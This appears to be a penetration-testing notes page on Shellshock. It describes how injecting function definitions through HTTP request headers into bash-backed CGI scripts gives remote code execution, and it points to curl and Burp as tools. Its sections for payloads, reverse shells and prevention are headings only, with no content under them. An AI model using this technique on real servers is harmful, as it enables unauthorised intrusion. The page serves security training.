Shellshock
What is it?
Shellshock is a software configuration flaw within how bash handled functions being defined within environment variables (Request Headers) and exported them. Web Servers that utilized /bin/sh on the back end, utilized CGI scripts, or used popen() or system() functions are vulnerable to this exploit. (@lcamtuf) The alternative use is to use /bin/dash which does not have the vulnerability.
An example is a site (e.g http://test.com/serverstats.cgi) that runs a /bin/bash script. By looking at the site's source performs a simple GET requests that runs the a script but since its using /bin/bash, by modifying the User Agent, Referer, or Cookie headers we can get RCE on server side.
Use
echo
for padding as servers can return a 500 error if not used.
Exploiting
You can use Curl command or Burp Repeater for fast modifications
Burp
Curl
Cheat Sheet
Shellshock Inject Payloads
Blind Shellsheck Injection
Reverse Shell Payload
Display Kernel Version
Prevention
References
[Ref1] : Sec542 course demo https://www.sans.org/course/web-app-penetration-testing-ethical-hacking
Picture: https://blog.knapsy.com/blog/2014/10/07/basic-shellshock-exploitation/
Last updated